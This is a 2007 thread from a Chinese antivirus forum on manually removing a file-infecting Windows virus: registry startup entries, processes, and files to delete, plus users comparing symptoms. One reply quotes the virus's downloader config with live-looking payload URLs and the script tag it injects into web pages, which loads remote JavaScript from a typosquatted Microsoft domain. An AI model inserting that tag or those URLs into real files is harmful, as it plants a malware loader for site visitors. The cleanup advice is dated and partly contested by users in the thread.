瑞星卡卡安全论坛
枫笑九洲 - 2007-4-1 16:08:00
以下项目如果存在的话:在sreng里的启动项里删
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<随机字串><C:\DOCUME~1\用户名\LOCALS~1\Temp\upxdnd.exe> [N/A]
<随机字串><C:\DOCUME~1\用户名\LOCALS~1\Temp\crasos.exe> [N/A]
<随机字串><C:\DOCUME~1\用户名\LOCALS~1\Temp\c0nime.exe> [N/A]
<随机字串><C:\DOCUME~1\用户名\LOCALS~1\Temp\rundl132.exe> [N/A]
<随机字串><C:\DOCUME~1\用户名\LOCALS~1\Temp\winlog0n.exe> [N/A]
<sysload><C:\windows\system32\sysload3.exe> [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><C:\DOCUME~1\用户名\LOCALS~1\Temp\upxdnd.exe> [N/A]
<cmdbcs><C:\DOCUME~1\用户名\LOCALS~1\Temp\cmdbcs.exe> [N/A]
<sysload><C:\windows\system32\sysload3.exe> [N/A]
==========================================================================================
打开冰刃,进程,中止以下进程,
iexplore.exe
sysload3.exe
上面启动项里的exe文件如果在进程中的话,中止
==========================================================================================
右键单击explorer-->模块信息,强行解除以下文件
lgsy0.dll
rav20.dll
gjzo0.dll
msxo0.dll
upxdnd.dll
==========================================================================================
在sreng里,系统修复-->host文件-->重置
==========================================================================================
好了,现在基本上大局己定了,收尾工作开始
进入C:\DOCUME~1\用户名\LOCALS~1\Temp目录,删以下文件:
c0nime.exe
crasos.exe
gjzo0.dll
iexpl0re.exe
lgsy0.dll
lgsy1.dll
msxo0.dll
rav20.dll (这个绝,居然伪装成瑞星文件)
rundl132.exe
upxdnd.exe
upxdnd.dll
winlog0n.exe
PS:上面8个全靠sysload3.exe释放,
==========================================================================================
进入windows目录删cmdbcs.exe
==========================================================================================
进入system目录,删以下文件:
1.exe一直到7.exe
cmdbcs.dll
sysload3.exe
==========================================================================================
清空临时文件夹里面的所有东西,包括
C:\Documents and Settings\<用户名>\Local Settings\Temp
C:\WINDOWS\TEMP
Internet临时文件夹(控制面板--〉“Internet选项”---〉“删除文件”---〉勾选“包括临时文件夹”--〉确定)
==========================================================================================
PS:下面这个是病毒配置文件清单,对应中毒者system32目录下的1.exe~7.exe
[config]
Version=1.0.6
NUM=7
1=http://61.153.247.76/cald/01.gif
2=http://61.153.247.76/cald/02.gif
3=http://61.153.247.76/cald/03.gif
4=http://61.153.247.76/cald/04.gif
5=http://61.153.247.75/cald/05.gif
6=http://61.153.247.75/cald/06.gif
7=http://61.153.247.75/cald/07.gif
hos=http://if.iloveck.com/test/hos.gif
UpdateMe=http://a.2007ip.com/5949645046.exe (居然还有自动升级程序,汗)
tongji=http://if.iloveck.com/test/tongji.htm
更绝的是它会自动检测软驱,并且自我复制到软驱中
至于感染exe文件,我还没有发现,呵呵,
枫笑九洲 - 2007-4-1 16:11:00
近期好多人中这个毒,
望置顶
newcenturymoon - 2007-4-1 16:12:00
这个病毒主要是感染文件 呵呵
newcenturymoon - 2007-4-1 16:12:00
类似威金或者熊猫 不光感染文件还下载木马
枫笑九洲 - 2007-4-1 16:13:00
| 引用: |
【newcenturymoon的贴子】这个病毒主要是感染文件 呵呵
……………… |
有什么症状没?
我exe文件,html文件,bat文件全试了一遍,没感染的现象发生呀,
newcenturymoon - 2007-4-1 16:14:00
如果要有其他分区应该可以发现 虚拟机里好像只有一个分区不好发现
枫笑九洲 - 2007-4-1 16:20:00
| 引用: |
【newcenturymoon的贴子】如果要有其他分区应该可以发现 虚拟机里好像只有一个分区不好发现
……………… |
呵呵,我虚拟机中确实只有一个分区
PS:如果真这样,大家都跟我学吧,买个160G硬盘,不分区,就一个区用,呵呵,
emptyzero - 2007-4-1 16:29:00
此病毒会感染除系统盘外的所有EXE文件
这是染毒后程序上传扫描的截图
附件:
860802200741162008.jpg
emptyzero - 2007-4-1 16:31:00
而且一点染毒的程序,染毒程序就会写注册表RUN项并启动IE和NOTEPAD,如果我让他启动的话,IE和记事本的界面也不会出现,但进程里能发现这两个进程
我想他启动IE是要从网络下载病毒,不过我删除了HOST文件后就不能下载了,所以没什么反应,但不知道为什么要启动记事本
newcenturymoon - 2007-4-1 16:35:00
启动记事本 是为了感染文件
枫笑九洲 - 2007-4-1 16:37:00
| 引用: |
【newcenturymoon的贴子】启动记事本 是为了感染文件
……………… |
呵呵,启动记事本是为了使1.exe~7.exe释放病毒文件
emptyzero - 2007-4-1 16:39:00
不明白,记事本我看了下好像都很正常,没出现中毒的情况,弱弱地问下怎么感染,我是菜鸟莫怪
emptyzero - 2007-4-1 16:40:00
| 引用: |
【枫笑九洲的贴子】
呵呵,启动记事本是为了使1.exe~7.exe释放病毒文件
……………… |
能否说的详细点
kk痞子李 - 2007-4-1 16:44:00
大侠们救命啊
我机器好象就被感染了!
正迷惑中?
有能1V1帮我解决的吗?
PS:冰刃哪里有下?
还有,我按楼主的方法清除完,但我还有被感染的程序是不是还会反复中啊?
枫笑九洲 - 2007-4-1 16:48:00
| 引用: |
【kk痞子李的贴子】大侠们救命啊
我机器好象就被感染了!
正迷惑中?
有能1V1帮我解决的吗?
PS:冰刃哪里有下?
还有,我按楼主的方法清除完,但我还有被感染的程序是不是还会反复中啊?
……………… |
如果真和7楼说的一样,估计还会中
天月来了 - 2007-4-1 16:50:00
中了它就全格吧。
别的没法想。
现在的文件备份太重要了。
newcenturymoon - 2007-4-1 16:50:00
| 引用: |
【emptyzero的贴子】
能否说的详细点
……………… |
6、启NOTEPAD进程,便利本地磁盘,感染大小在10K---10M之间的.exe文件,感染后图标不变,使病毒难以被察觉。
7、感染HTML .ASPX .HTM .PHP .JSP .ASP和 .EXE文件,并向.HTML .ASPX .HTM .PHP .JSP .ASP文件里植入以下代码:
<script src=http://macr.microfsot.com/<removed>.js></script>
或者
<script language="javascript" src="http://%6D%61%63%72%2E%6D%69%63%72%6F%66%73%6F%74%2E%63%6F%6D/<removed>.js"></script>
kk痞子李 - 2007-4-1 16:50:00
我目前已经发现我运行UTALK时会出现
别的还不知道~ 我该怎么办啊?
newcenturymoon - 2007-4-1 16:52:00
他感染 exe文件导致 用杀毒软件 如瑞星全盘杀毒 尽量不要用国外软件 (卡巴)等 他们会直接干掉文件 而不是清除病毒
tonyv - 2007-4-1 16:52:00
试了一下最新的瑞星 19.16.60,还是杀不掉 因为我压缩了个染毒的文件邮给了版主,那个压缩包,瑞星并没有查出病毒来。
我还有个奇怪的现象
按楼顶的方法实施后,按理说至少在内存中没毒了,只要是不运行其它盘里的EXE文件,应该是安全的,可是机器运行一会后,瑞星监控的图标虽然在,可是双击再也出不来杀毒界面了。
皓婉凝霜血 - 2007-4-1 16:55:00
高手们能不能照顾一下新手,你们说的冰刃是什么东西!?
我好像也中了这种病毒,郁闷了~~~
tonyv - 2007-4-1 16:58:00
冰刃=IceSword
emptyzero - 2007-4-1 16:59:00
请问是否染毒的所有程序都得重装,能否清除
另外:确切地说感染系统盘之外的所有EXE文件,并不准确,因为我发现我D盘的QQ、WORD、PPT、SSM、KAV(中毒时未开)都未感染,但同为OFFICE家族的EXCEL却感染了(当时也没开)
还有如果将所有的病毒文件清除了,运行染毒文件并没多大影响,源头已断,只会调用IE和记事本程序及写注册表RUN项,但并无危害
kk痞子李 - 2007-4-1 17:19:00
大侠们 怎么没有下文了?
我还等着救命呢啊~!~~
蓝狐zy - 2007-4-1 17:25:00
按照你的方法清除了病毒
我在进程中结束了webpnt.exe
然后在C/windows/system32/webpnt.exe 清除了它
但重启后它又在进程中了 CPU占用100% 它一个占90%
蓝狐zy - 2007-4-1 17:26:00
老这样机子就报废啦
红心遐想 - 2007-4-1 17:46:00
除了有1.exe~9.exe的文件存在,其他都没有
ssydn123 - 2007-4-1 18:12:00
用最新的瑞星好像能杀~~
手动杀毒不知道为什么我这里不能,我找不到那些文件,
kk痞子李 - 2007-4-1 19:31:00
根据个人经验,楼住说的那些文件并不全对
不过主要的还是有的,
次病毒重点是 TEMP 里边的文件!
一定要彻底清除掉!
csyken - 2007-4-1 20:13:00
右键单击explorer-->模块信息,强行解除以下文件
lgsy0.dll
rav20.dll
gjzo0.dll
msxo0.dll
upxdnd.dll
请问楼主,..菜鸟小弟不明白这项这么操作..可以写详细一点么?
© 2000 - 2026 Rising Corp. Ltd.